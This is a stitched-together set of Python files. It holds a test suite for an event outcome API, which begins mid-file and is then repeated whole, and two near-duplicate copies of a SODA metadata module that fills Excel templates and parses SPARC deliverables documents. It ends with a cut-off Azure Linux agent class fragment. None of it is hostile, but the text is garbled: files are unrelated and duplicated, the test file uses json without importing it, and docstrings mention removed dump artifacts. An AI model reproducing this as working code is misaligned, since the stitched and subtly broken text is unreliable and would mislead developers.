        # expired ORM instances.
        self.event1_user1_outcome1_id = self.event1_user1_outcome1.id
        self.event1_user1_outcome2_id = self.event1_user1_outcome2.id
        self.event1_user2_outcome_id = self.event1_user2_outcome.id
        self.event2_user1_outcome_id = self.event2_user1_outcome.id
        self.test_user1_id = self.test_user1.id

    def test_repository_get_latest_by_user_for_event(self):
        """Repository returns the newest outcome per user/event."""
        self.seed_static_data()

        latest = outcome_repository.get_latest_by_user_for_event(self.test_user1.id, self.event1.id)
        self.assertEqual(latest.id, self.event1_user1_outcome2.id)
        self.assertEqual(latest.status, Status.ACCEPTED)

        latest = outcome_repository.get_latest_by_user_for_event(self.test_user2.id, self.event1.id)
        self.assertEqual(latest.id, self.event1_user2_outcome.id)
        self.assertEqual(latest.status, Status.REJECTED)

    def test_get_all_by_user_for_event(self):
        """Repository returns every outcome for a user, not just the latest."""
        self.seed_static_data()
        outcomes = outcome_repository.get_all_by_user_for_event(self.test_user1.id, self.event1.id)
        self.assertEqual(len(outcomes), 2)
        # NOTE: assertItemsEqual is the Python 2 spelling of assertCountEqual.
        self.assertItemsEqual(
            [o.id for o in outcomes],
            [self.event1_user1_outcome1.id, self.event1_user1_outcome2.id])

    def test_get_latest_for_event(self):
        """Repository returns the latest outcome of every user for an event."""
        self.seed_static_data()
        outcomes = outcome_repository.get_latest_for_event(self.event1.id)
        self.assertEqual(len(outcomes), 2)
        self.assertItemsEqual(
            [o.id for o in outcomes],
            [self.event1_user1_outcome2.id, self.event1_user2_outcome.id])

    def test_outcome_get(self):
        """GET returns the caller's latest outcome for the event."""
        self.seed_static_data()
        response = self.app.get(
            '/api/v1/outcome',
            data={'event_id': self.event1.id},
            headers=self.get_auth_header_for('<EMAIL>'))
        payload = json.loads(response.data)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(payload['id'], self.event1_user1_outcome2_id)
        self.assertEqual(payload['status'], 'ACCEPTED')
        self.assertEqual(payload['timestamp'], self.event1_user1_outcome2.timestamp.isoformat())

    def test_get_with_no_outcome(self):
        """GET returns 404 when the user has no outcome for the event."""
        self.seed_static_data()
        response = self.app.get(
            '/api/v1/outcome',
            data={'event_id': self.event2.id},
            headers=self.get_auth_header_for('<EMAIL>'))
        self.assertEqual(response.status_code, 404)

    def test_outcome_post_non_event_admin(self):
        """POST is forbidden for users who are not admins of the event."""
        self.seed_static_data()
        response = self.app.post(
            '/api/v1/outcome',
            data={
                'event_id': self.event1.id,
                'user_id': self.test_user1.id,
                'outcome': 'ACCEPTED'
            },
            headers=self.get_auth_header_for('<EMAIL>'))
        json.loads(response.data)
        self.assertEqual(response.status_code, 403)

    def test_post(self):
        """POST records a new outcome and demotes the previous latest one."""
        self.seed_static_data()
        response = self.app.post(
            '/api/v1/outcome',
            data={
                'event_id': self.event2.id,
                'user_id': self.test_user1.id,
                'outcome': 'REJECTED'
            },
            headers=self.get_auth_header_for('<EMAIL>'))
        json.loads(response.data)
        self.assertEqual(response.status_code, 201)

        outcomes = outcome_repository.get_all_by_user_for_event(self.test_user1_id, self.event2.id)
        outcomes = sorted(outcomes, key=lambda o: o.timestamp)
        print(outcomes)
        # The original WAITLIST outcome is superseded by the new REJECTED one.
        self.assertEqual(outcomes[0].status, Status.WAITLIST)
        self.assertFalse(outcomes[0].latest)
        self.assertEqual(outcomes[1].status, Status.REJECTED)
        self.assertTrue(outcomes[1].latest)

    def test_outcome_list_get_event_admin(self):
        """Outcome list is forbidden for non-admin users."""
        self.seed_static_data()
        response = self.app.get(
            '/api/v1/outcome-list',
            data={'event_id': self.event1.id},
            headers=self.get_auth_header_for('<EMAIL>'))
        self.assertEqual(response.status_code, 403)

    def test_outcome_list_get_correct_event_admin(self):
        """Outcome list is forbidden for admins of a different event."""
        self.seed_static_data()
        response = self.app.get(
            '/api/v1/outcome-list',
            data={'event_id': self.event1.id},
            headers=self.get_auth_header_for('<EMAIL>'))
        self.assertEqual(response.status_code, 403)

    def test_outcome_list_get(self):
        """Event admins can list the latest outcome of every user."""
        self.seed_static_data()
        response = self.app.get(
            '/api/v1/outcome-list',
            data={'event_id': self.event1.id},
            headers=self.get_auth_header_for('<EMAIL>'))
        payload = json.loads(response.data)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(payload), 2)
        self.assertItemsEqual(
            [entry['user']['email'] for entry in payload],
            ['<EMAIL>', '<EMAIL>'])
from datetime import datetime, timedelta
from app import db, LOGGER
from app.utils.testing import ApiTestCase
from app.outcome.models import Outcome, Status
from app.outcome.repository import OutcomeRepository as outcome_repository
class OutcomeApiTest(ApiTestCase):
    """Tests for the outcome repository and the /outcome API endpoints."""

    def seed_static_data(self):
        """Create two events, two applicants, two event admins and four outcomes."""
        db.session.expire_on_commit = False

        self.event1 = self.add_event(name={'en': 'Event 1'}, key='event1')
        self.event2 = self.add_event(name={'en': 'Event 2'}, key='event2')

        self.test_user1 = self.add_user('<EMAIL>')
        self.test_user2 = self.add_user('<EMAIL>')
        self.event1_admin = self.add_user('<EMAIL>')
        self.event2_admin = self.add_user('<EMAIL>')
        self.event1.add_event_role('admin', self.event1_admin.id)
        self.event2.add_event_role('admin', self.event2_admin.id)

        # Event 1 / user 1: superseded WAITLIST followed by the latest ACCEPTED.
        self.event1_user1_outcome1 = Outcome(self.event1.id, self.test_user1.id, 'WAITLIST', self.event1_admin.id)
        self.event1_user1_outcome1.reset_latest()
        self.event1_user1_outcome2 = Outcome(self.event1.id, self.test_user1.id, 'ACCEPTED', self.event1_admin.id)
        # Event 1 / user 2: single REJECTED outcome.
        self.event1_user2_outcome = Outcome(self.event1.id, self.test_user2.id, 'REJECTED', self.event1_admin.id)
        # Event 2 / user 1: single WAITLIST outcome.
        self.event2_user1_outcome = Outcome(self.event2.id, self.test_user1.id, 'WAITLIST', self.event2_admin.id)
        db.session.add_all([
            self.event1_user1_outcome1,
            self.event1_user1_outcome2,
            self.event1_user2_outcome,
            self.event2_user1_outcome
        ])
        db.session.commit()

        self.add_email_template('outcome-rejected')
        self.add_email_template('outcome-waitlist')
        db.session.flush()

        # Capture ids/values up front so later assertions don't rely on
        # expired ORM instances.
        self.event1_user1_outcome1_id = self.event1_user1_outcome1.id
        self.event1_user1_outcome2_id = self.event1_user1_outcome2.id
        self.event1_user2_outcome_id = self.event1_user2_outcome.id
        self.event2_user1_outcome_id = self.event2_user1_outcome.id
        self.test_user1_id = self.test_user1.id

    def test_repository_get_latest_by_user_for_event(self):
        """Repository returns the newest outcome per user/event."""
        self.seed_static_data()

        latest = outcome_repository.get_latest_by_user_for_event(self.test_user1.id, self.event1.id)
        self.assertEqual(latest.id, self.event1_user1_outcome2.id)
        self.assertEqual(latest.status, Status.ACCEPTED)

        latest = outcome_repository.get_latest_by_user_for_event(self.test_user2.id, self.event1.id)
        self.assertEqual(latest.id, self.event1_user2_outcome.id)
        self.assertEqual(latest.status, Status.REJECTED)

    def test_get_all_by_user_for_event(self):
        """Repository returns every outcome for a user, not just the latest."""
        self.seed_static_data()
        outcomes = outcome_repository.get_all_by_user_for_event(self.test_user1.id, self.event1.id)
        self.assertEqual(len(outcomes), 2)
        # NOTE: assertItemsEqual is the Python 2 spelling of assertCountEqual.
        self.assertItemsEqual(
            [o.id for o in outcomes],
            [self.event1_user1_outcome1.id, self.event1_user1_outcome2.id])

    def test_get_latest_for_event(self):
        """Repository returns the latest outcome of every user for an event."""
        self.seed_static_data()
        outcomes = outcome_repository.get_latest_for_event(self.event1.id)
        self.assertEqual(len(outcomes), 2)
        self.assertItemsEqual(
            [o.id for o in outcomes],
            [self.event1_user1_outcome2.id, self.event1_user2_outcome.id])

    def test_outcome_get(self):
        """GET returns the caller's latest outcome for the event."""
        self.seed_static_data()
        response = self.app.get(
            '/api/v1/outcome',
            data={'event_id': self.event1.id},
            headers=self.get_auth_header_for('<EMAIL>'))
        payload = json.loads(response.data)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(payload['id'], self.event1_user1_outcome2_id)
        self.assertEqual(payload['status'], 'ACCEPTED')
        self.assertEqual(payload['timestamp'], self.event1_user1_outcome2.timestamp.isoformat())

    def test_get_with_no_outcome(self):
        """GET returns 404 when the user has no outcome for the event."""
        self.seed_static_data()
        response = self.app.get(
            '/api/v1/outcome',
            data={'event_id': self.event2.id},
            headers=self.get_auth_header_for('<EMAIL>'))
        self.assertEqual(response.status_code, 404)

    def test_outcome_post_non_event_admin(self):
        """POST is forbidden for users who are not admins of the event."""
        self.seed_static_data()
        response = self.app.post(
            '/api/v1/outcome',
            data={
                'event_id': self.event1.id,
                'user_id': self.test_user1.id,
                'outcome': 'ACCEPTED'
            },
            headers=self.get_auth_header_for('<EMAIL>'))
        json.loads(response.data)
        self.assertEqual(response.status_code, 403)

    def test_post(self):
        """POST records a new outcome and demotes the previous latest one."""
        self.seed_static_data()
        response = self.app.post(
            '/api/v1/outcome',
            data={
                'event_id': self.event2.id,
                'user_id': self.test_user1.id,
                'outcome': 'REJECTED'
            },
            headers=self.get_auth_header_for('<EMAIL>'))
        json.loads(response.data)
        self.assertEqual(response.status_code, 201)

        outcomes = outcome_repository.get_all_by_user_for_event(self.test_user1_id, self.event2.id)
        outcomes = sorted(outcomes, key=lambda o: o.timestamp)
        print(outcomes)
        # The original WAITLIST outcome is superseded by the new REJECTED one.
        self.assertEqual(outcomes[0].status, Status.WAITLIST)
        self.assertFalse(outcomes[0].latest)
        self.assertEqual(outcomes[1].status, Status.REJECTED)
        self.assertTrue(outcomes[1].latest)

    def test_outcome_list_get_event_admin(self):
        """Outcome list is forbidden for non-admin users."""
        self.seed_static_data()
        response = self.app.get(
            '/api/v1/outcome-list',
            data={'event_id': self.event1.id},
            headers=self.get_auth_header_for('<EMAIL>'))
        self.assertEqual(response.status_code, 403)

    def test_outcome_list_get_correct_event_admin(self):
        """Outcome list is forbidden for admins of a different event."""
        self.seed_static_data()
        response = self.app.get(
            '/api/v1/outcome-list',
            data={'event_id': self.event1.id},
            headers=self.get_auth_header_for('<EMAIL>'))
        self.assertEqual(response.status_code, 403)

    def test_outcome_list_get(self):
        """Event admins can list the latest outcome of every user."""
        self.seed_static_data()
        response = self.app.get(
            '/api/v1/outcome-list',
            data={'event_id': self.event1.id},
            headers=self.get_auth_header_for('<EMAIL>'))
        payload = json.loads(response.data)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(payload), 2)
        self.assertItemsEqual(
            [entry['user']['email'] for entry in payload],
            ['<EMAIL>', '<EMAIL>'])
### Import required python modules
import logging
from gevent import monkey; monkey.patch_all()
import platform
import os
from os import listdir, stat, makedirs, mkdir, walk, remove, pardir
from os.path import isdir, isfile, join, splitext, getmtime, basename, normpath, exists, expanduser, split, dirname, getsize, abspath
import pandas as pd
import time
from time import strftime, localtime
import shutil
from shutil import copy2
from configparser import ConfigParser
import numpy as np
from collections import defaultdict
import subprocess
from websocket import create_connection
import socket
import errno
import re
import gevent
from blackfynn import Blackfynn
from blackfynn.log import get_logger
from blackfynn.api.agent import agent_cmd
from blackfynn.api.agent import AgentError, check_port, socket_address
from urllib.request import urlopen
import json
import collections
from threading import Thread
import pathlib
from openpyxl import load_workbook
from openpyxl import Workbook
from openpyxl.styles import PatternFill, Font
from docx import Document
from datetime import datetime, timezone
userpath = expanduser("~")
metadatapath = join(userpath, 'SODA', 'SODA_metadata')

DEV_TEMPLATE_PATH = join(dirname(__file__), "..", "file_templates")
# once pysoda has been packaged with pyinstaller
# it becomes nested into the pysodadist/api directory
PROD_TEMPLATE_PATH = join(dirname(__file__), "..", "..", "file_templates")
TEMPLATE_PATH = DEV_TEMPLATE_PATH if exists(DEV_TEMPLATE_PATH) else PROD_TEMPLATE_PATH

# Module logging: both basicConfig and the explicit handler write to
# ~/<module>.log at DEBUG level.
logging.basicConfig(level=logging.DEBUG, filename=os.path.join(os.path.expanduser("~"), f"{__name__}.log"))
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
handler = logging.FileHandler(os.path.join(os.path.expanduser("~"), f"{__name__}.log"))
handler.setLevel(logging.DEBUG)
logger.addHandler(handler)
# basicConfig above already attached a root handler writing to the same file;
# without this, every record emitted through `logger` would propagate to the
# root handler and be written twice.
logger.propagate = False
class InvalidDeliverablesDocument(Exception):
    """Raised when a selected file is not a valid SPARC Deliverables Document."""
    pass
### Import Milestone document
def import_milestone(filepath):
    """Read the first table of a Deliverables .docx into a list of row dicts.

    The first table row supplies the dict keys for every following row.
    Raises InvalidDeliverablesDocument when the document contains no table.
    """
    doc = Document(filepath)
    try:
        table = doc.tables[0]
    except IndexError:
        raise InvalidDeliverablesDocument("Please select a valid SPARC Deliverables Document! The following headers could not be found in a table of the document you selected: Related milestone, aim, or task, Description of data, and Expected date of completion.")
    rows = []
    header_keys = None
    for row_no, row in enumerate(table.rows):
        cell_texts = (cell.text for cell in row.cells)
        if row_no == 0:
            # The header row becomes the dictionary keys.
            header_keys = tuple(cell_texts)
            continue
        rows.append(dict(zip(header_keys, cell_texts)))
    return rows
def extract_milestone_info(datalist):
    """Group deliverable rows by their milestone name.

    Accepts either header spelling ("Related milestone, aim, or task" or
    "Related milestone, aim or task"). Rows whose milestone cell is empty are
    skipped. Raises InvalidDeliverablesDocument when a row has neither header.
    """
    milestone_headers = ("Related milestone, aim, or task",
                         "Related milestone, aim or task")
    detail_keys = ["Description of data", "Expected date of completion"]
    milestone = defaultdict(list)
    for row in datalist:
        for header in milestone_headers:
            if header in row:
                break
        else:
            raise InvalidDeliverablesDocument("Please select a valid SPARC Deliverables Document! The following headers could not be found in a table of the document you selected: Related milestone, aim, or task, Description of data, and Expected date of completion.")
        name = row[header]
        if name != "":
            milestone[name].append({k: row[k] for k in detail_keys})
    return milestone
### Prepare submission file
def save_submission_file(filepath, json_str):
    """Copy the submission.xlsx template to *filepath* and fill in its values.

    *json_str* is a JSON array whose first three entries are written to
    cells C2..C4 of Sheet1.
    """
    destination = filepath
    shutil.copyfile(join(TEMPLATE_PATH, "submission.xlsx"), destination)
    # JSON array -> python list of cell values.
    values = json.loads(json_str)
    wb = load_workbook(destination)
    sheet = wb['Sheet1']
    sheet["C2"] = values[0]
    sheet["C3"] = values[1]
    sheet["C4"] = values[2]
    wb.save(destination)
from string import ascii_uppercase
import itertools
def excel_columns():
    """Return Excel column letters starting at 'D': D..Z then AA..ZZ.

    NOTE: supports at most 23 + 26*26 = 699 contributors/links.
    """
    singles = list(ascii_uppercase[3:])  # skip A-C, which hold fixed fields
    doubles = [a + b for a, b in itertools.product(ascii_uppercase, repeat=2)]
    return singles + doubles
def rename_headers(workbook, keyword_array, contributor_role_array, funding_array, total_link_array):
    """Adjust the "Value" header columns to fit the widest metadata list.

    When any list holds more than 3 entries, the headers become
    "Value", "Value 2", ... styled with the template's blue fill and bold
    font; otherwise the unused spare columns are deleted from the sheet.
    """
    # Widest of: keywords, funding (SPARC award + other sources), links,
    # contributors — determines how many value columns are needed.
    max_len = max(
        len(keyword_array),
        len(funding_array),
        len(total_link_array),
        len(contributor_role_array),
    )
    columns_list = excel_columns()
    if max_len > 3:
        workbook[columns_list[0] + "1"] = "Value"
        # Style objects are immutable in openpyxl, so build them once and
        # share them across all header cells instead of per-iteration.
        blue_fill = PatternFill(start_color='9CC2E5',
                                end_color='9CC2E5',
                                fill_type='solid')
        bold_font = Font(bold=True)
        for i, column in zip(range(2, max_len + 1), columns_list[1:]):
            workbook[column + "1"] = "Value " + str(i)
            cell = workbook[column + "1"]
            cell.fill = blue_fill
            cell.font = bold_font
    else:
        # Drop every spare value column beyond the ones actually used.
        delete_range = len(columns_list) - max_len - 1
        workbook.delete_cols(4 + max_len, delete_range)
### Prepare dataset-description file
def populate_dataset_info(workbook, val_array):
    """Fill dataset name, description, keywords and sample/subject counts.

    Returns the keyword list so the caller can size the header columns.
    """
    # name, description, number of subjects / samples
    workbook["D2"] = val_array[0]
    workbook["D3"] = val_array[1]
    workbook["D17"] = val_array[3]
    workbook["D16"] = val_array[4]
    # keywords, one per value column starting at D
    for keyword, column in zip(val_array[2], excel_columns()):
        workbook[column + "4"] = keyword
    return val_array[2]
def populate_contributor_info(workbook, val_array):
    """Write funding, acknowledgments and per-contributor columns.

    Returns [funding, contributors] so rename_headers can size the sheet.
    """
    ## award info
    # One funding entry per column on row 11.
    for i, column in zip(range(len(val_array["funding"])), excel_columns()):
        workbook[column + "11"] = val_array["funding"][i]
    ### Acknowledgments
    workbook["D10"] = val_array["acknowledgment"]
    ### Contributors
    # One contributor per column; rows 5-9 hold name, ID, affiliation,
    # role and contact flag.
    for contributor, column in zip(val_array['contributors'], excel_columns()):
        workbook[column + "5"] = contributor["conName"]
        workbook[column + "6"] = contributor["conID"]
        # NOTE: "conAffliation" (sic) matches the key the caller sends.
        workbook[column + "7"] = contributor["conAffliation"]
        workbook[column + "9"] = contributor["conContact"]
        workbook[column + "8"] = contributor["conRole"]
    return [val_array["funding"], val_array['contributors']]
def populate_links_info(workbook, val_array):
    """Write one column per link; rows 12-14 pick the cell by link type,
    row 15 carries the description. Returns the merged link list."""
    ## originating DOI, Protocol DOI
    total_link_array = val_array["Originating Article DOI"] + val_array["Protocol URL or DOI*"] + val_array["Additional Link"]
    for i, column in zip(range(len(total_link_array)), excel_columns()):
        # Exactly one of rows 12/13/14 gets the link; the others are blanked.
        if total_link_array[i]["link type"] == "Originating Article DOI":
            workbook[column + "12"] = total_link_array[i]["link"]
            workbook[column + "13"] = ""
            workbook[column + "14"] = ""
            workbook[column + "15"] = total_link_array[i]["description"]
        if total_link_array[i]["link type"] == "Protocol URL or DOI*":
            workbook[column + "12"] = ""
            workbook[column + "13"] = total_link_array[i]["link"]
            workbook[column + "14"] = ""
            workbook[column + "15"] = total_link_array[i]["description"]
        if total_link_array[i]["link type"] == "Additional Link":
            workbook[column + "12"] = ""
            workbook[column + "13"] = ""
            workbook[column + "14"] = total_link_array[i]["link"]
            workbook[column + "15"] = total_link_array[i]["description"]
    return total_link_array
def populate_completeness_info(workbook, val_array, bfaccountname):
    """Fill completeness fields; resolve parent dataset names to Blackfynn
    IDs via the given account. Raises a friendly error when the account
    profile is missing; any other Blackfynn error is re-raised."""
    ## completeness, parent dataset ID, title Respectively
    workbook["D18"] = val_array["completeness"]
    workbook["D20"] = val_array["completeDSTitle"]
    ## parent Datasets
    parentds_id_array = []
    try:
        bf = Blackfynn(bfaccountname)
        for dataset in val_array["parentDS"]:
            myds = bf.get_dataset(dataset)
            dataset_id = myds.id
            parentds_id_array.append(dataset_id)
        workbook["D19"] = ", ".join(parentds_id_array)
    except Exception as err:
        # NOTE: blackfynn package 3.2.0 misspells 'invalid'
        if 'Invalid profile name' in str(err) or "Invaid profile name" in str(err):
            raise Exception("Please connect SODA with Blackfynn to use this feature!")
        raise
### generate the file
def save_ds_description_file(bfaccountname, filepath, dataset_str, misc_str, optional_str, con_str):
    """Generate a dataset_description.xlsx at *filepath*.

    Copies the bundled template, decodes the four JSON payloads, fills
    each section via the populate_* helpers, resizes the headers and
    saves the workbook in place.

    Fix: the final statement carried a dataset-dump artifact
    ("| src/pysoda/prepare_metadata.py |") fused onto it; removed.
    """
    source = join(TEMPLATE_PATH, "dataset_description.xlsx")
    destination = filepath
    shutil.copyfile(source, destination)
    # json array to python list
    val_arr_ds = json.loads(dataset_str)
    val_arr_con = json.loads(con_str)
    val_arr_misc = json.loads(misc_str)
    val_arr_optional = json.loads(optional_str)
    # write to excel file
    wb = load_workbook(destination)
    ws1 = wb['Sheet1']
    ret_val_1 = populate_dataset_info(ws1, val_arr_ds)
    ret_val_2 = populate_contributor_info(ws1, val_arr_con)
    ret_val_3 = populate_links_info(ws1, val_arr_misc)
    populate_completeness_info(ws1, val_arr_optional, bfaccountname)
    rename_headers(ws1, ret_val_1, ret_val_2[1], ret_val_2[0], ret_val_3)
    wb.save(destination)
### Import required python modules
import logging
from gevent import monkey; monkey.patch_all()
import platform
import os
from os import listdir, stat, makedirs, mkdir, walk, remove, pardir
from os.path import isdir, isfile, join, splitext, getmtime, basename, normpath, exists, expanduser, split, dirname, getsize, abspath
import pandas as pd
import time
from time import strftime, localtime
import shutil
from shutil import copy2
from configparser import ConfigParser
import numpy as np
from collections import defaultdict
import subprocess
from websocket import create_connection
import socket
import errno
import re
import gevent
from blackfynn import Blackfynn
from blackfynn.log import get_logger
from blackfynn.api.agent import agent_cmd
from blackfynn.api.agent import AgentError, check_port, socket_address
from urllib.request import urlopen
import json
import collections
from threading import Thread
import pathlib
from openpyxl import load_workbook
from openpyxl import Workbook
from openpyxl.styles import PatternFill, Font
from docx import Document
from datetime import datetime, timezone
userpath = expanduser("~")
metadatapath = join(userpath, 'SODA', 'SODA_metadata')
# Template lookup: a dev checkout keeps templates one level up; the
# pyinstaller bundle nests this module one level deeper.
DEV_TEMPLATE_PATH = join(dirname(__file__), "..", "file_templates")
# once pysoda has been packaged with pyinstaller
# it becomes nested into the pysodadist/api directory
PROD_TEMPLATE_PATH = join(dirname(__file__), "..", "..", "file_templates")
TEMPLATE_PATH = DEV_TEMPLATE_PATH if exists(DEV_TEMPLATE_PATH) else PROD_TEMPLATE_PATH
# Log everything to ~/<module>.log.
# NOTE(review): basicConfig already installs a handler for this exact file;
# the explicit FileHandler below writes every record twice — confirm intent.
logging.basicConfig(level=logging.DEBUG, filename=os.path.join(os.path.expanduser("~"), f"{__name__}.log"))
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
handler = logging.FileHandler(os.path.join(os.path.expanduser("~"), f"{__name__}.log"))
handler.setLevel(logging.DEBUG)
logger.addHandler(handler)
class InvalidDeliverablesDocument(Exception):
    """Raised when a selected file is not a valid SPARC Deliverables document."""
    pass
### Import Milestone document
def import_milestone(filepath):
    """Parse the first table of a SPARC Deliverables .docx into row dicts.

    The first table row supplies the dict keys; each later row becomes one
    dict. Raises InvalidDeliverablesDocument when the document has no table.
    """
    doc = Document(filepath)
    try:
        table = doc.tables[0]
    except IndexError:
        raise InvalidDeliverablesDocument("Please select a valid SPARC Deliverables Document! The following headers could not be found in a table of the document you selected: Related milestone, aim, or task, Description of data, and Expected date of completion.")
    data = []
    keys = None
    for i, row in enumerate(table.rows):
        text = (cell.text for cell in row.cells)
        # headers will become the keys of our dictionary
        if i == 0:
            keys = tuple(text)
            continue
        # Construct a dictionary for this row, mapping
        # keys to values for this row
        row_data = dict(zip(keys, text))
        data.append(row_data)
    return data
def extract_milestone_info(datalist):
    """Group deliverable rows by their milestone column.

    Accepts either header spelling ("Related milestone, aim, or task" or
    "Related milestone, aim or task"). Rows whose milestone cell is empty
    are dropped. Raises InvalidDeliverablesDocument when neither header
    is present in a row.
    """
    grouped = defaultdict(list)
    header_variants = ("Related milestone, aim, or task",
                       "Related milestone, aim or task")
    detail_keys = ["Description of data", "Expected date of completion"]
    for row in datalist:
        header = next((h for h in header_variants if h in row), None)
        if header is None:
            raise InvalidDeliverablesDocument("Please select a valid SPARC Deliverables Document! The following headers could not be found in a table of the document you selected: Related milestone, aim, or task, Description of data, and Expected date of completion.")
        milestone_name = row[header]
        if milestone_name != "":
            grouped[milestone_name].append({k: row[k] for k in detail_keys})
    return grouped
### Prepare submission file
def save_submission_file(filepath, json_str):
    """Copy the submission.xlsx template to *filepath* and fill C2-C4.

    json_str is a JSON array of three strings written to C2, C3 and C4 —
    presumably award, milestone and completion date; verify against caller.
    """
    source = join(TEMPLATE_PATH, "submission.xlsx")
    destination = filepath
    shutil.copyfile(source, destination)
    # json array to python list
    val_arr = json.loads(json_str)
    # write to excel file
    wb = load_workbook(destination)
    ws1 = wb['Sheet1']
    # date_obj = datetime.strptime(val_arr[2], "%Y-%m")
    # date_new = date_obj.strftime("%m-%Y")
    ws1["C2"] = val_arr[0]
    ws1["C3"] = val_arr[1]
    ws1["C4"] = val_arr[2]
    wb.save(destination)
from string import ascii_uppercase
import itertools
def excel_columns():
    """Return the spreadsheet column labels used for value cells.

    Starts at column D (A-C are reserved in the template) and continues
    through the two-letter columns AA..ZZ.

    NOTE: does not support more than 699 contributors/links
    """
    double_letter = [first + second
                     for first, second in itertools.product(ascii_uppercase, repeat=2)]
    return list(ascii_uppercase[3:]) + double_letter
def rename_headers(workbook, keyword_array, contributor_role_array, funding_array, total_link_array):
    """
    Rename header columns if values exceed 3. Change Additional Values to Value 4, 5,...

    The widest of the four multi-valued rows decides how many "Value N"
    header columns the sheet keeps; unused template columns are deleted.
    """
    # keywords
    keyword_len = len(keyword_array)
    # contributors
    no_contributors = len(contributor_role_array)
    # funding = SPARC award + other funding sources
    funding_len = len(funding_array)
    # total links added
    link_len = len(total_link_array)
    max_len = max(keyword_len, funding_len, link_len, no_contributors)
    columns_list = excel_columns()
    if max_len > 3:
        # Relabel column D as "Value" and E onward as "Value 2", "Value 3", ...
        workbook[columns_list[0] + "1"] = "Value"
        for i, column in zip(range(2, max_len+1), columns_list[1:]):
            workbook[column + "1"] = "Value " + str(i)
            cell = workbook[column + "1"]
            # Match the template header style (light blue fill, bold).
            blueFill = PatternFill(start_color='9CC2E5',
                                   end_color='9CC2E5',
                                   fill_type='solid')
            font = Font(bold=True)
            cell.fill = blueFill
            cell.font = font
    else:
        # Drop the unused template columns after the last populated one.
        delete_range = len(columns_list) - max_len - 1
        workbook.delete_cols(4+max_len, delete_range)
### Prepare dataset-description file
def populate_dataset_info(workbook, val_array):
    """Fill dataset name/description/counts and the keyword row.

    val_array is presumably [name, description, keywords, samples,
    subjects] — order inferred from the cells written below; verify
    against the caller. Returns the keyword list for rename_headers.
    """
    ## name, description, samples, subjects
    workbook["D2"] = val_array[0]
    workbook["D3"] = val_array[1]
    workbook["D17"] = val_array[3]
    workbook["D16"] = val_array[4]
    ## keywords
    # One keyword per column starting at D, all on row 4.
    for i, column in zip(range(len(val_array[2])), excel_columns()):
        workbook[column + "4"] = val_array[2][i]
    return val_array[2]
def populate_contributor_info(workbook, val_array):
    """Write funding, acknowledgments and per-contributor columns.

    Returns [funding, contributors] so rename_headers can size the sheet.
    """
    ## award info
    # One funding entry per column on row 11.
    for i, column in zip(range(len(val_array["funding"])), excel_columns()):
        workbook[column + "11"] = val_array["funding"][i]
    ### Acknowledgments
    workbook["D10"] = val_array["acknowledgment"]
    ### Contributors
    # One contributor per column; rows 5-9 hold name, ID, affiliation,
    # role and contact flag.
    for contributor, column in zip(val_array['contributors'], excel_columns()):
        workbook[column + "5"] = contributor["conName"]
        workbook[column + "6"] = contributor["conID"]
        # NOTE: "conAffliation" (sic) matches the key the caller sends.
        workbook[column + "7"] = contributor["conAffliation"]
        workbook[column + "9"] = contributor["conContact"]
        workbook[column + "8"] = contributor["conRole"]
    return [val_array["funding"], val_array['contributors']]
def populate_links_info(workbook, val_array):
    """Write one column per link; rows 12-14 pick the cell by link type,
    row 15 carries the description. Returns the merged link list."""
    ## originating DOI, Protocol DOI
    total_link_array = val_array["Originating Article DOI"] + val_array["Protocol URL or DOI*"] + val_array["Additional Link"]
    for i, column in zip(range(len(total_link_array)), excel_columns()):
        # Exactly one of rows 12/13/14 gets the link; the others are blanked.
        if total_link_array[i]["link type"] == "Originating Article DOI":
            workbook[column + "12"] = total_link_array[i]["link"]
            workbook[column + "13"] = ""
            workbook[column + "14"] = ""
            workbook[column + "15"] = total_link_array[i]["description"]
        if total_link_array[i]["link type"] == "Protocol URL or DOI*":
            workbook[column + "12"] = ""
            workbook[column + "13"] = total_link_array[i]["link"]
            workbook[column + "14"] = ""
            workbook[column + "15"] = total_link_array[i]["description"]
        if total_link_array[i]["link type"] == "Additional Link":
            workbook[column + "12"] = ""
            workbook[column + "13"] = ""
            workbook[column + "14"] = total_link_array[i]["link"]
            workbook[column + "15"] = total_link_array[i]["description"]
    return total_link_array
def populate_completeness_info(workbook, val_array, bfaccountname):
    """Fill completeness fields; resolve parent dataset names to Blackfynn
    IDs via the given account. Raises a friendly error when the account
    profile is missing; any other Blackfynn error is re-raised."""
    ## completeness, parent dataset ID, title Respectively
    workbook["D18"] = val_array["completeness"]
    workbook["D20"] = val_array["completeDSTitle"]
    ## parent Datasets
    parentds_id_array = []
    try:
        bf = Blackfynn(bfaccountname)
        for dataset in val_array["parentDS"]:
            myds = bf.get_dataset(dataset)
            dataset_id = myds.id
            parentds_id_array.append(dataset_id)
        workbook["D19"] = ", ".join(parentds_id_array)
    except Exception as err:
        # NOTE: blackfynn package 3.2.0 misspells 'invalid'
        if 'Invalid profile name' in str(err) or "Invaid profile name" in str(err):
            raise Exception("Please connect SODA with Blackfynn to use this feature!")
        raise
### generate the file
def save_ds_description_file(bfaccountname, filepath, dataset_str, misc_str, optional_str, con_str):
    """Generate a dataset_description.xlsx at *filepath*.

    Copies the bundled template, decodes the four JSON payloads, fills
    each section via the populate_* helpers, resizes the headers and
    saves the workbook in place.

    Fix: the final statement carried a dataset-dump artifact
    ("| 0.311951 | 0.114839 |") fused onto it; removed.
    """
    source = join(TEMPLATE_PATH, "dataset_description.xlsx")
    destination = filepath
    shutil.copyfile(source, destination)
    # json array to python list
    val_arr_ds = json.loads(dataset_str)
    val_arr_con = json.loads(con_str)
    val_arr_misc = json.loads(misc_str)
    val_arr_optional = json.loads(optional_str)
    # write to excel file
    wb = load_workbook(destination)
    ws1 = wb['Sheet1']
    ret_val_1 = populate_dataset_info(ws1, val_arr_ds)
    ret_val_2 = populate_contributor_info(ws1, val_arr_con)
    ret_val_3 = populate_links_info(ws1, val_arr_misc)
    populate_completeness_info(ws1, val_arr_optional, bfaccountname)
    rename_headers(ws1, ret_val_1, ret_val_2[1], ret_val_2[0], ret_val_3)
    wb.save(destination)
from azurelinuxagent.common.exception import ProtocolError
import azurelinuxagent.common.logger as logger
# pylint: disable=W0105
"""
Base class for data contracts between guest and host and utilities to manipulate the properties in those contracts
"""
# pylint: enable=W0105
class DataContract(object):
